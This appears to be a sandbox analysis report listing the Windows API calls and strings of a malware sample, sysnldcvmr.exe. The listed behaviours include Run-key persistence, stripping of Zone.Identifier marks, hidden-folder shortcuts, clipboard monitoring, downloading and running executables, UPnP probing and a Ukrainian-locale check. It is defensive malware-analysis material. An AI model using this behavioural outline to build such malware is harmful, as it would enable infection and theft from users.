• wsprintfW.USER32 ref: 0040762A
• DeleteFileW.KERNEL32(?), ref: 0040763A
• ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
• wcscmp.NTDLL ref: 00407663
• ExitProcess.KERNEL32 ref: 00407682
Memory Dump Source
• Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
Similarity
• API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
• String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
• API String ID: 4172876685-2783337622

Control-flow Graph
APIs
• _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
• wsprintfW.USER32 ref: 004066EF
• wsprintfW.USER32 ref: 0040670F
• wsprintfW.USER32 ref: 0040672F
• wsprintfW.USER32 ref: 0040674F
• wsprintfW.USER32 ref: 00406768
• PathFileExistsW.SHLWAPI(?), ref: 00406778
• SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
• DeleteFileW.KERNEL32(?), ref: 004067BE
• PathFileExistsW.SHLWAPI(?), ref: 004067CB
• PathFileExistsW.SHLWAPI(?), ref: 004067E0
• SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
• DeleteFileW.KERNEL32(?), ref: 00406803
• PathFileExistsW.SHLWAPI(?), ref: 00406810
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
• SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
• PathFileExistsW.SHLWAPI(?), ref: 00406843
Similarity
• API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
• String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$shell32.dll$shell32.dll
• API String ID: 2467965697-1256475382

Control-flow Graph
APIs
• CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
• wsprintfW.USER32 ref: 00406595
• FindFirstFileW.KERNEL32(?,?), ref: 004065AC
• lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
• lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
• wsprintfW.USER32 ref: 0040660A
• wsprintfW.USER32 ref: 0040662A
• MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
• FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
• FindClose.KERNEL32(000000FF), ref: 0040668F
• RemoveDirectoryW.KERNEL32(?), ref: 00406699
Similarity
• API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
• String ID: %s\%s$%s\%s$%s\*$ok@
• API String ID: 92872011-32713442
APIs
• GetSystemInfo.KERNEL32(?,?), ref: 00402043
• InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
• CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
  • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
• WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
• setsockopt.WS2_32 ref: 004020D1
• htons.WS2_32(?), ref: 00402101
• bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
• listen.WS2_32(?,7FFFFFFF), ref: 0040212F
• WSACreateEvent.WS2_32 ref: 0040213A
• WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
  • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
  • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
  • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
  • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
  • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
  • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
Similarity
• API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
• String ID:
• API String ID: 1603358586-0
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
• htons.WS2_32(0000076C), ref: 0040D760
• inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
• setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
  • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
  • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
  • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
  • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
• bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
• lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
• sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
• ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
  • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
  • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
  • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
  • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
  • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
Similarity
• API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
• String ID: 239.255.255.250
• API String ID: 726339449-2186272203
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
• socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
• htons.WS2_32(?), ref: 00401508
• setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
• bind.WS2_32(?,?,00000010), ref: 0040153B
  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
• CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
Similarity
• API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
• String ID:
• API String ID: 4174406920-0
APIs
• GetTickCount.KERNEL32 ref: 0040CD02
• ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
• recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
• GetTickCount.KERNEL32 ref: 0040CD74
• Sleep.KERNEL32(00000001), ref: 0040CD94
• GetTickCount.KERNEL32 ref: 0040CD9A
Similarity
• API ID: CountTick$Sleepioctlsocketrecv
• String ID:
• API String ID: 107502007-0
APIs
• htons.WS2_32(00000050), ref: 0040AAAD
  • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
  • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
• socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
• connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
• getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
Strings
• www.update.microsoft.com, xrefs: 0040AAB7
                                                                    Similarity
                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                    • String ID: www.update.microsoft.com
                                                                    • API String ID: 4063137541-1705189816
                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                    APIs
                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryQueryVirtual
                                                                    • String ID: oA$ oA$ oA
                                                                    • API String ID: 2850889275-3725432611
                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                    APIs
                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                    • String ID: Bz@
                                                                    • API String ID: 1815803762-793989200
                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                    • String ID:
                                                                    • API String ID: 3943618503-0
                                                                    • Opcode ID: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                    • Opcode Fuzzy Hash: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                    • strcmp.NTDLL ref: 0040E752
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocalestrcmp
                                                                    • String ID: UKR
                                                                    • API String ID: 3191669094-64918367
                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                    • rand.MSVCRT ref: 0040EB39
                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                    • rand.MSVCRT ref: 0040ED41
                                                                    • rand.MSVCRT ref: 0040ED55
                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.Mw
                                                                    • API String ID: 3709769524-1426338499
                                                                    • Opcode ID: f19e2e49e4841eae6c8170c725b321c375bdafcc36d8594c690cf09b2969f998
                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                    • Opcode Fuzzy Hash: f19e2e49e4841eae6c8170c725b321c375bdafcc36d8594c690cf09b2969f998
                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                    • API String ID: 2906596889-2213908610
                                                                    • Opcode ID: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                    • Opcode Fuzzy Hash: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                    • String ID: PCOI$ilci
                                                                    • API String ID: 3345448188-3762367603
                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E518
                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                    • API String ID: 2761394606-2217117414
                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                    • String ID: PCOI$ilci$.Mw
                                                                    • API String ID: 2403999931-2607080227
                                                                    • Opcode ID: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                    • Opcode Fuzzy Hash: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98

                                                                    Control-flow Graph (graph image not reproduced; executed/not-executed colouring lost. Entry block 405970-405992 calls GetWindowLongW; every path ends in the DefWindowProcA block at 405ba4-405bbd, i.e. this is a window procedure.)
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
